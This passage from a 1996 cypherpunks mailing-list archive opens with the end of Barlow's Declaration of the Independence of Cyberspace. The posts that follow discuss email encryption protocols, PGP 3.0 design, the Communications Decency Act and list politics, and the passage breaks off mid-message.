But I do hope this cry will echo across Cyberspace, changing and growing
and self-replicating, until it becomes a great shout equal to the idiocy
they have just inflicted upon us.

I give you...



A Declaration of the Independence of Cyberspace

Governments of the Industrial World, you weary giants of flesh and steel, I
come from Cyberspace, the new home of Mind. On behalf of the future, I ask
you of the past to leave us alone. You are not welcome among us. You have
no sovereignty where we gather.

We have no elected government, nor are we likely to have one, so I address
you with no greater authority than that with which liberty itself always
speaks. I declare the global social space we are building to be naturally
independent of the tyrannies you seek to impose on us. You have no moral
right to rule us nor do you possess any methods of enforcement we have true
reason to fear.

Governments derive their just powers from the consent of the governed. You
have neither solicited nor received ours. We did not invite you. You do not
know us, nor do  you know our world. Cyberspace does not lie within your
borders. Do not think that you can build it, as though it were a public
construction project. You cannot. It is an act of nature and it grows
itself through our collective actions.

You have not engaged in our great and gathering conversation, nor did you
create the wealth of our marketplaces. You do not know our culture, our
ethics, or the unwritten codes that already provide our society more order
than could be obtained by any of your impositions.

You claim there are problems among us that you need to solve. You use this
claim as an excuse to invade our precincts. Many of these problems don't
exist. Where there are real conflicts, where there are wrongs, we will
identify them and address them by our means. We are forming our own Social
Contract . This governance will arise according to the conditions of our
world, not yours. Our world is different.

Cyberspace consists of transactions, relationships, and thought itself,
arrayed like a standing wave in the web of our communications.  Ours is a
world that is both everywhere and nowhere, but it is not where bodies live.

We are creating a world that all may enter without privilege or prejudice
accorded by race, economic power, military force, or station of birth.

We are creating a world where anyone, anywhere may express his or her
beliefs, no matter how singular, without fear of being coerced into silence
or conformity.

Your legal concepts of property, expression, identity, movement, and
context do not apply to us. They are based on matter, There is no matter
here.

Our identities have no bodies, so, unlike you, we cannot obtain order by
physical coercion. We believe that from ethics, enlightened self-interest,
and the commonweal, our governance will emerge . Our identities may be
distributed across many of your jurisdictions. The only law that all our
constituent cultures would generally recognize is the Golden Rule. We hope
we will be able to build our particular solutions on that basis.  But we
cannot accept the solutions you are attempting to impose.

In the United States, you have today created a law, the Telecommunications
Reform Act, which repudiates your own Constitution and insults the dreams
of Jefferson, Washington, Mill, Madison, DeToqueville, and Brandeis. These
dreams must now be born anew in us.

Your increasingly obsolete information industries would perpetuate
themselves by proposing laws, in America and elsewhere, that claim to own
speech itself throughout the world. These laws would declare ideas to be
another industrial product, no more noble than pig iron. In our world,
whatever the human mind may create can be reproduced and distributed
infinitely at no cost. The global conveyance of thought no longer requires
your factories to accomplish.

These increasingly hostile and colonial measures place us in the same
position as those previous lovers of freedom and self-determination who had
to reject the authorities of distant, uninformed powers. We must declare our
virtual selves immune to your sovereignty, even as we continue to consent to
your rule over our bodies. We will spread ourselves across the Planet so
that no one can arrest our thoughts.

We will create a civilization of the Mind in Cyberspace. May it be more
humane and fair than the world your governments have made before.

Davos, Switzerland
February 8, 1996


****************************************************************
John Perry Barlow, Cognitive Dissident
Co-Founder, Electronic Frontier Foundation
Home(stead) Page: http://www.eff.org/~barlow
Message Service: 800/634-3542

*****************************************************************

It is error alone which needs the support of government.  Truth can
stand by itself.

                         --Thomas Jefferson, Notes on Virginia


Signers of the declaration of Independence of Cyberspace:

---
Andrew F. Daniels                                      Computing Specialist
http://nickel.ucs.indiana.edu/~andrew                 Pager: (800) 958-4503
adaniels@ais.net                                             andrew@cic.net
statements made represent the views of the author and no other organization
         finger andrew@hamlet.ucs.indiana.edu for further details

---

PPP   A   TTTTT M   M   A   N   N
P  P A A    T   MM MM  A A  NN  N      Patrick C. Farabee
PPP  AAA    T   M M M  AAA  N N N
P   A   A   T   M M M A   A N  NN      pfarabee@intersource.com
P   A   A   T   M   M A   A N   N  










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 15 Feb 1996 09:16:05 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: secure web page ideas
Message-ID: <Pine.SUN.3.91.960214122949.19989A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


For those people who have Netscape / an SSL-enabled web-browser, wouldn't 
it be useful to have secure web pages that did the following:

(1) An anonymous remailer web page, like the current ones (this one has 
    the obvious advantage that plaintext doesn't travel to the http server)

(2) A pgp-sending web page (type in key id into field, send message to 
    address given, encrypted)  This isn't a bad idea for the same reason that
    (1) above is a much better idea.

(3) Ultimately, a server that did (2), through (1).  Being able to send PGP
    encrypted email to a recipient through anonymous remailers, over the web
    with a secure browser might be PGP's "killer app" in one way or another.

How hard would this be to implement? Would it be worth waiting until the PGP 
3.0 API is released?

Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 15 Feb 1996 18:52:36 +0800
To: "Roy M. Silvernail" <roy@sendai.cybrspc.mn.org>
Subject: Re: Put the Protest where your money is.
In-Reply-To: <960213.212846.8b1.rnr.w165w@sendai.cybrspc.mn.org>
Message-ID: <Pine.SUN.3.91.960214123512.11074D-100000@amanda>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Feb 1996, Roy M. Silvernail wrote:

> I got a dollar bill yesterday with a rubber-stamped speech baloon saying
> "I Grew Hemp" next to George's head.  First one I'd seen, so the
> transmission layer isn't too crowded.

Very cool! It does sound like this is not a bad idea at all.  :) And 
considering how many hands a bill exchanges, it's an excellent way to 
distribute info.


==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Fri, 16 Feb 1996 18:06:53 +0800
To: cypherpunks@toad.com
Subject: Re: Subject lines?
Message-ID: <2.2.32.19960214204503.006a1e50@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:27 AM 2/14/96 -0500, olbon@dynetics.com (Clay Olbon II) wrote:

>Ok, has everyone forgotten to use a subject line today, or is there a
>problem with toad.com?  Every message I received today that was dated 14
>Feb (except one - from "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>)
>had no subject and no from line (other than cypherpunks). 

I'd noticed the same thing, and am a little disgruntled, since it screws up
my usual mail filtering.

Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 15 Feb 1996 16:45:58 +0800
To: pem-dev@neptune.tis.com
Subject: A brief comparison of email encryption protocols
Message-ID: <199602142049.MAA20108@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


   This message briefly reviews and compares the four major email
encryption protocols under discussion: MOSS, PGP, PGP/MIME, and
S/MIME. Each is capable of adequate security, but also suffers from
the lack of good implementation, in the context of transparent email
encryption.

   I will try to address issues of underlying cryptographic soundness,
ease of integration with email, implementation issues, support for
multimedia and Web datatypes, and backwards compatibility.

   An additional grave concern is key management. Contrary to some
beliefs, key management is not a solved problem. All of the proposals
contain some mechanism for key management, but none of them have been
demonstrated to be scalable to an Internet-wide email system. My
belief is that the problems with key management do not stem from the
classic Web of trust/certification hierarchy split, but the
nonexistence of a distributed database (with nice interfaces) for
holding keys. The encryption protocols also stand in the way of such a
database, with key formats that are either overly complex, inadequate,
or both.

   In case it is not clear by now, this review will be quite
subjective, in many cases representing my own beliefs rather than
objective fact. I'll try to point that out where I can. Also, I do not
claim to have a thorough understanding of PEM and PKCS. Much of my
knowledge comes from implementing premail, a tool that acts as "glue"
between mailers and encryption packages. It supports PGP, MOSS (using
the TIS/MOSS 7.1 implementation), and a draft of PGP/MIME, in addition
to a wide range of anonymous remailer services. While usable, premail
has many limitations, and certainly does not represent the "holy
grail" of transparent email/crypto integration. Thus, my participation
in the Internet Mail Consortium Secuirty Workshop
(http://www.imc.org/security-workshop.html).

   I apologize for the wide distribution, and ask that followups be
trimmed.


PGP
---

   PGP (Pretty Good Privacy) is, of course, the de facto standard for
email encryption on the Internet.
   PGP's underlying cryptography is quite sound - RSA (up to 2048 bits
with the most recent implementation), IDEA with a 128 bit key, and
MD5. PGP is entirely in accordance with the recent recommendations on
minimum keylength (http://www.bsa.org/bsa/cryptologists.html), and in
fact does not include a mode of operation in violation of those
recommendations. This makes PGP (and, by extension, PGP/MIME) unique
among the encryption protocols.
   PGP is packaged in a single application (i.e. a single binary)
which performs encryption, decryption, signing, verification, and key
management. It does not depend on the existence of great deal of
infrastructure. These factors have, in my opinion, been decisive in
PGP's popularity.

   However, PGP is still not suitable for fully transparent email
encryption. The reasons are complex, and I will only touch on them
here.

   The main missing feature is the lack of MIME integration. Thus, PGP
is not suitable for multimedia types other than US-ASCII text. PGP
does contain some support for 8-bit charsets, but at cross-purposes
with MIME. Signature checking of non-US-ASCII data is simply not
reliable. To give an idea of this problem, the most recent
international version (2.6.3i) tries several different character set
conversions when verifying signatures, to see if any of them will
work.
   However, since a large fraction of email _is_ US-ASCII text, this
feature alone probably does not explain the lack of deployment. PGP
contains a number of implementation flaws (including silly things like
not locking files, so that concurrent invocations fail). In addition,
key management has some problems. Mostly, key management is hard to
learn, time consuming, and requires a great deal of manual
intervention. The "Web of trust" is supposed to fix this, by providing
transitive trust of key authenticity. However, in practice the Web of
trust has not delivered. In my experience (with many dozen
correspondents), I have only had one or two keys transitively trusted.

   A standard PGP-signed message consists of a "-----BEGIN PGP SIGNED
MESSAGE-----" line, the signed text (subject to some canonicalization
rules), a "----BEGIN PGP SIGNATURE-----" line, a version line, the PGP
signature itself, and an "-----END PGP SIGNATURE-----" line. All this
is in the message body. The headers indicate that the message is a
standard 7-bit, us-ascii, text/plain message. Thus, mailers have to
parse the message contents to identify the message as PGP signed, or
to extract the signed parts. This is at cross-purposes with MIME.
Mailer implementors are reluctant to include such ad-hoc extensions.
Existing extensibility mechanisms, based on MIME, cannot be used.
   PGP encrypted messages are similar - the identification as an
encrypted message can only be made by parsing the message body.

   One technical problem with PGP is its inability to support
single-pass processing, because the data format includes a size
field.


PGP/MIME
--------

   PGP/MIME is an effort to integrate MIME and PGP. There is a
workable draft based on the MIME security multiparts, but the PGP/MIME
mailing list is divided. Some particpants are happy with the existing
draft, while others feel that other points in the design space
(for the most part, labelling existing PGP message formats with
appropriate MIME types) would be better.
   The design space is large and complex, with many constraints on
efficiency, simplicity, backwards compatibility, and functionality. It
is not clear that a consensus will develop at all.
   There are two implementations of the PGP/MIME draft: premail, and
the PGPMIME reference implementation by Michael Elkins.
   For more information about the PGP/MIME draft, see
http://www.c2.org/~raph/pgpmime.html .


PGP 3.0
-------

   Many people are hoping that PGP 3.0 will somehow come along and
solve all their problems. PGP 3.0 is only an evolutionary improvement
over the existing implementations (MIT PGP 2.6.2 and PGP 2.6.3i). For
the most part, it will support only the existing message formats.
There may be support for decoding draft PGP/MIME signed messages, but
this is still being negotiated.
   The main advance in PGP 3.0 is a cleaned up implemenation. The PGP
2.6.2 code is disgusting, and should not be integrated directly into
any mailer application. The 3.0 code will be modular and based on
published interfaces. Furthermore, the 3.0 development team plans to
release the code as both a stand-alone application and as a library.
   It is difficult to predict when the public release will happen.
Based on what I've seen, fall of 1996 seems the most likely.


MOSS
----

   MOSS (MIME Object Security Services) is an attempt at an email
encryption protocol in accordance with MIME. It is currently an
Internet RFC. There is a reference implementation (TIS/MOSS 7.1).
   MOSS is mostly cryptographically sound. However, the choice of
symmetric encryption algorithm (and key size) is left unspecified.
Thus, it cannot be said that MOSS is in accordance with the
recommendations for minimum keysize. In fact, the only public
implementation, TIS/MOSS 7.1, uses 56-bit DES, which is in direct
violation of these standards.
   The TIS/MOSS implementation has a number of other problems. It is
big and complex, probably due to its TIS/PEM ancestry. For more
information about TIS/MOSS, see
http://www.tis.com/docs/Products/tismoss.html .

   MOSS supports two modes of key management: X.509, and completely
manual key management. In this way, it is a dramatic advance over PEM,
which only supported X.509, but life for implementors remains hard.
One feature which I believe is sorely lacking is a cryptographic hash
of the public key as the basic unit of manual key management. Thus,
people either have to trust the mechanism by which the key was
delivered, or examine the base-64 representation of the entire key. I
consider this to be a serious usability problem.
   For an example of how hashes of keys have been done right, see
Netscape 2.0's handling of untrusted certificates.


S/MIME
------

   S/MIME is an attempt to graft MIME support onto underlying PEM
standards. See http://www.rsa.com/rsa/S-MIME/ for more info.

   I feel compelled to deal harshly with RSA's S/MIME FAQ
(http://www.rsa.com/rsa/S-MIME/smimeqa.htm). It suggests that MOSS has
interoperability problems because of multiple implementations, while
S/MIME presumably doesn't. I take strong exception to this statement.
There is no technical basis for it. I consider the possibility of
admitting multiple implementations as a _requirement_ for an Internet
email standard. However, because S/MIME is documented, it hopefully
will be possible to create independent implementations, in spite of
what RSA says.

   The only symmetric encryption algorithm mandated by S/MIME is
40-bit RC2. Thus, S/MIME is in violation of the key size
recommendations. Further, RC2 has not been confirmed to be publicly
known. If RC2 is not known, then an independent implementation of
S/MIME is impossible. Fortunately, source code for an alleged
implementation of RC2 has recently been posted to the Internet,
resolving this problem, if it is authentic. If not, then my
reservations remain.

   S/MIME also recommends 56-bit DES CBC and (either 112 or 168 bit)
DES EDE3-CBC. This is good; any S/MIME implementation in accordance
with the recommendations will conform to the keysize recommendations
as well.

   S/MIME remains firmly grounded in the X.509 certification
hierarchy, although the FAQ claims that the guidelines for hierarchies
are "more flexible" than in PEM.

   One cryptographic weakness of S/MIME is that eavesdroppers can
distinguish between encrypted and signed-and-encrypted messages. This
violates the principle of disclosing a minimum amount of information.
PGP, PGP/MIME, and MOSS do not have this problem.

   Probably the most controversial aspect of S/MIME is its signature
format. An S/MIME signed message is a MIME multipart in which the
first part is the data to be signed, and the second part is a complete
PKCS #7 (section 10) signed message. This protects quite well against
munging by mail transport, but has two problems. First, the size of
the message is doubled. Second, the fact that the two singed messages
are identical is not enforced (if it were, mailer munging would cause
too many signatures to fail). Thus, Eve can send Alice and Bob a
message (M1, (M2, Signature(M2))). Alice, not having an S/MIME
implementation, would see only M1. Bob, having an S/MIME
implementation, would see only M2, for which the signature would
check. Alice, being suspicious, might call Bob up on the telephone and
ask whether the signature was really valid. Bob would of course say
yes. Unless they compared notes on the contents, they would not notice
the discrepancy. To my mind, this counts as protocol failure, and thus
it is not possible to claim that S/MIME conforms to best cryptographic
practice.
   I would expect that doubling the message body will create
performance problems in a Web environment. For example, if the first
message is used for display, then it becomes necessary to compare the
two messages. If, instead, the second message is used, then the first
message will be responsible for significant added latency.


Integration with mailers
------------------------

   Integration with mailers is quite difficult. In general, the mailer
implementor will need to add specific features to support
cryptography. Because of the restrictiveness of ITAR regulations, such
an approach may not be practical for US developers, at least while
supporting strong cryptography.
   Perhaps the biggest feature required in the mailer is integration
of key management and the "address book". If this feature is not
implemented in the mailer, then two address books are required - one
to select email addresses, and another to map email addresses to keys.
This approach is used by premail, and is the source of many usability
problems. It would be nice if a database existed which could map email
addresses to public keys without manual intervention, but none of the
proposals on the table are capable of it. Such a database would
certainly improve usability, as well as making it considerably easier
to 

   Another feature that is required for fully transparent integration
is caching of decrypted session keys. If not implemented, then the
user interface delays in navigating a mail folder become unacceptable.
To my knowledge, no implementation supports this feature.
   One dimension in the design space is whether the cryptographic
engine is tightly integrated with the mailer (i.e. shares an address
space), or is a separate process that communicates with the mailer.
Both approaches have been implemented. Both approaches are subject to
numerous pitfalls, which have unfortunately not been entirely avoided.
   These issues have more to do with implementation than with the
encryption protocol, but I thought I'd mention them here, so that they
are not actively thwarted.


Conclusion
----------

   All of the proposals described here can be used for secure email.
None of them will be widely deployed in this capacity unless they are
implemented well. I have concerns that both MOSS and S/MIME are
susceptible to political pressure which will restrict key sizes
insecurely in practice. I would like to see consensus develop around
one of the proposals, so that energies used for implementation can be
more focussed and effective. It is my hope that this conference will
move in that direction.

Raph Levien





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Neal" <dneal@electrotex.com>
Date: Thu, 15 Feb 1996 12:55:11 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: [NOISY] Re: New Internet Privacy Provider - Press Release
Message-ID: <199602141854.MAA03609@etex.electrotex.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Sat, 10 Feb 1996 18:12:58 -0500 (EST)
> From:          "Declan B. McCullagh" <declan+@CMU.EDU>
> To:            cypherpunks@toad.com, Vincent Cate <vince@offshore.com.ai>
> Subject:       [NOISY] Re: New Internet Privacy Provider - Press Release
> Cc:            

> Excerpts from internet.cypherpunks: 9-Feb-96 New Internet Privacy
> Provid.. by Vincent Cate@offshore.co 
> > PRESS RELEASE:  2/9/96  Anguilla, Offshore Information Services Ltd.
> >  
> > As a result of recent efforts to censor the Internet in France, Germany,
> > China, and now the USA, [we] anticipate
> > a larger market for privacy services over the Internet. ...
> 
> Thanks, but no thanks. I don't need a shell account at $1,200 a year.
> 


You though that was bad?  (Besides I though it was $300/yr not a quarter)
try their clearing services!  $500/mo + 6% of all tranactions.  Yeoch.

 I know T1s and satellite links overseas are  expensive, but they're not THAT 
expensive.  Hey, Mark Twain.  Form a seychelles entity with the same fee
schedule as your U.S. counterpart.  You won't know what to do with all
the money!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 15 Feb 1996 13:03:14 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Response to Perrygram
In-Reply-To: <ad47590d050210045742@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960214124658.6947A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Timothy C. May wrote:

> At 2:04 PM 2/14/96, Robert Hettinga wrote:
> 
> >Perry and Tim,
> >
> >Why don't you two have sex already? The tension around here is getting
> >unbearable...
> 
> And why don't you stop cluttering up the list with supposedly cute stuff
> like this?

I was quite serious.  I find it immensely entertaining and valueable.  
Mr. Metzger in many ways, perhaps unwittingly, perhaps by design, forces 
the list to evaluate and consider how wide the scope of crypto actually 
reaches.  Everytime he asks "what does this have to do with crypto" he 
tends to be responded to with some quite creative and original connections 
(and some not so creative or original).  Everytime Mr. May points out 
arguments for wider topicality the reverse is true for the code purists.  
Discourse.  Extremely valuable in my view.  I'll refrain from commenting 
on Mr. Hettinga's comment.

> The couple of fairly short messages I've written in response to comments by
> Perry are *as nothing* compared to the tons of verbiage in the Jim Bell
> flame wars, the VZNUri/Detweiler flames, and even the Black Unicorn vs.
> Netscape battle.

Mr. May takes my point the wrong way.  Again, I was quite literal.  I 
think the conflict is the best thing since crosstalk.  It hits right on 
the money as to what this list is about from two extremely opposed 
parties, one with a more liberal (literal, not political) view as to what 
is on topic, and one with a more conserative (again, literal, not 
political) view.  As to my own Netscape rantings, well, I'll leave that 
without comment too.

> (If anyone can point to examples where I have engaged in protracted--more
> than a couple of short messages--flames, please send me pointers to these
> examples in private mail. I claim no especial morality, but I do think I've
> stayed out of ongoing flame wars. I haven't even commented on
> "assassination politics," even though it's just a watered-down and
> poorly-thought-out version of what I wrote about in 1988...easier to just
> delete the ramblings.)

As I state above, I think the argument is a long running theme for which 
Mr. May and Mr. Metzger are the opposing camp figureheads.  I wouldn't 
call your discussions "flame wars" (with the possible exception of the 
occasional low barb by Mr. Metzger) at all.

> And yet people like Bob and Uni feel compelled to throw their two cents in
> about what a spectacle this is.

Again, I was pointing out the value and interest of the specticle, not 
its lack of merit.  It is my view that empassioned discourse is among the 
most devine of human expressions, but then, legal education tends to 
indoctrinate that view.

> Get real.

I was being quite real.  I'm sorry you took it as sarcasm.  The pair of 
you should start a PBS show.  Seriously.

> --Tim May
> 
> Boycott espionage-enabled software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Sat, 17 Feb 1996 16:22:07 +0800
To: cypherpunks@toad.com
Subject: The Internet Party
Message-ID: <199602142101.NAA25866@well.com>
MIME-Version: 1.0
Content-Type: text/plain



If I see one more ad for some dumb ass politician running for
president I'm going to puke.

<bright idea!>

Say, why not pick our own candidate?

Why not form our own Party?

The Internet party........

It would be the ultimate write in campaign.

Now all we need is a candidate who stands for free speech, personal
privacy and the right to encrypt.......

"I nominate John Perry Barlow. Who will second the nomination?"

No, I'm not kidding.....

Brian

"Communicate globally, Censor locally."
"Only a fool would let children play alone on a superhighway."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 15 Feb 1996 15:12:55 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks in 3/96 WIRED -"Wisecrackers" by Steven Levy
Message-ID: <I5kIx8m9Ls8f085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Cypherpunks figure prominently in an article by Steven Levy, called
"Wisecrackers" (p. 128), about codebreaking efforts like last year's 
Hack SSL effort and Ian Goldberg's and David Wagner's crack of Netscape's
encryption.  A quick scan reveals what seems to be a sensible and intelligent
article.

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMSJPHOVevBgtmhnpAQGM1QL+I57APNZi10VzxR2zswIzKxZ2oGJ62o/t
OWT8cBKcohttQEV2y+sdFa4wlaieQXSo4iE7/nFtafW9fG/U7+ISGWbWW0UHOiJq
0FTw0RIzbdlyuJd8j5zVXT5uYUcENtjB
=jAhn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 15 Feb 1996 23:11:10 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: Stealth PGP work
In-Reply-To: <10100.9602141537@dart.dcs.exeter.ac.uk>
Message-ID: <199602141830.NAA02458@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I presume he means stealth, and the functionality that it provides, as

I'm not familiar with the exact details of what stealth does, which is
why I asked for more details.  The problem is that PGP API, when
decrypting a message, keys off the PGP packet types in order to
operate.  If stealth can work outside of PGP 2.6.2, then it should be
possible to add it on to PGP 3, theoretically.

>   I raised this question myself to
> the pgp3 development team some time ago, and the reply I got was
> essentially that it would still be possible to have as an add-on, so
> there was no need to clutter the pgp3 functionality.

And in some ways this is true.  The PGP API does allow for add-ons.
I'll explain what I mean later in this message.  Then again, I don't
know to whom you spoke.  The "PGP 3 development team" has changed a
lot over the last couple years.  At this point, for all practical
purposes, there only two people on the team.

> However, if you provide an API call to unarmor with out decrypting,
> and a call to decrypt with out uncompressing, etc then a call to test
> for a particular user id on the assumption that it is addressed to
> that user id and is an encrypted message would fit in a similar way?

It is not implemented directly in this manner, but it is possible to
get this functionality.  The application will get a callback at which
point it can direct the PGP library.  For example, if you want to
dearmor but not decrypt, when you get to the encryption part you tell
it not to continue and to just output the encrypted block.

Basically, the PGP Message Processing API is based on a pipeline
model.  You have a bunch of pipeline modules that are connected, and
each module performs some transformation on the data.  For example,
you have a text module that goes into a literal module which goes into
a signature module which goes into an encryption module which then
goes into an armor module.  To add stealth, you just add a stealth
module in there.  However I can tell you now that we are not working
on such a module for the PGP 3.0 release.

I'll hopefully have the API Spec and Programmer's Guide in a state
where I can let others see it in the near future.  But since I'm going
to be off the net for about a week or two at the end of the month, it
might have to wait until March unless a miracle happens in the next
week.

I hope this helps.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 15 Feb 1996 13:20:37 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: CyberAngels
In-Reply-To: <199602140254.VAA14288@pipe4.nyc.pipeline.com>
Message-ID: <Yl8X7NO00YUsEOHsU9@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 13-Feb-96 Re: CyberAngels
> >The Guardian Angels have decided to enter cyberspace and make it safe for 
> >us all.  They have a FAQ on the web - http://www.safesurf.com/cyberangels/

I fear the so-called "CyberAngels" more than I do the Feds. At least
with their brand of jackboots, there can be accountability.

The CyberAngels are more like CyberCads, CyberFrauds, or CyberCriminals.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 17 Feb 1996 03:46:20 +0800
To: jamesd@echeque.com
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602140542.VAA18716@news1.best.com>
Message-ID: <Il8XBey00YUs0OHuMT@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 13-Feb-96 Re: Spin Control Alert (LI
.. by jamesd@echeque.com 
> Not obvious to me.
>  
> While the religious right clearly supported the push to regulate the
> internet, the main push seemed to me to come from the existing mass
> media, primarily the three big TV channels.

The religious right did not *support* the "push to regulate the
Internet" -- they drafted, defended, and pushed through the damn CDA!

Did you *read* the message I posted, with information about how the
religious right/anti-porn groups created and then worked to push this
legislation through Congress?

Did you *read* the files in my Rimm archive, detailing how an editor at
the Georgetown Law Journal worked to get Rimm's "research" approved for
publication? Did you know that he's a leading anti-porn activist?

Did you *read* Mike Godwin's collection of articles about how the
religious right organied the anti-porn scare?

Certainly the mass media were complicit, but they served a supporting role.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Feb 1996 16:20:54 +0800
To: cypherpunks@toad.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <ad478e480a021004d8cf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 AM 2/9/96, Duncan Frissell wrote:

>Look, the reason we hate the CDA is because it restricts speech.
>Restrictions on credit agencies gossiping about you are also speech
>restrictions.  If you are out in the world, people are going to talk about
>you.  The credit agencies are much easier to handle and less intrusive than
>the women were who talked about you while beating cloth on the rocks in the
>stream back in the old village.

Recall that in 1914 America adopted the "Gossiping and Busybodies Fair
Reporting Act," requiring all gossipers and busybodies to register their
planned speech acts with the typically-named Privacy Ombudsman (now
Ombudsperson). The modest registration fee of $75, a lot of money in 1914
of course, appears to have had a chilling effect on this market, as there
are few if any gossiping women beating clothes on rocks at the stream.

More seriously, what I find useful when thinking "There ought to be a law!"
thoughts is to imagine how it might be enforced against _me_. Creative
visualization. For example, while I get angry at times with TRW and
TransUnion like everyone else, I imagine a welter of laws about the keeping
of records and I imagine someone coming to *my* door and announcing that he
was there to inspect the contents of my hard drives to determine if I had
unlicensed data.

(Tim Philp's idea that this would only apply to "corporations" or
"businesses" (not clear which he means) misses the point. Am I, for
example, a business? Having such laws kick in at some well-defined
threshold would simply shift the nature of the information-gatherers...for
example, they's subcontract out the record-keeping to a raft of smaller,
linked entities. Then you'd have to prosecute people and companies for
accessing illegal data banks, etc.)

I am willing to support a few laws, about murder, theft, rape, etc., but
not busybody laws trying to control what information people collect.

If someone asks what the relevance to this list is of this issue, then they
really are as dumb as dirt, and as dumb as endangered dirt, too.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 15 Feb 1996 15:58:55 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: anonymous age credentials, sharing of
Message-ID: <Pine.SUN.3.91.960214143233.28807O-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Suppose Alice is a CA who issues anonymous age credentials.
Bob is 15
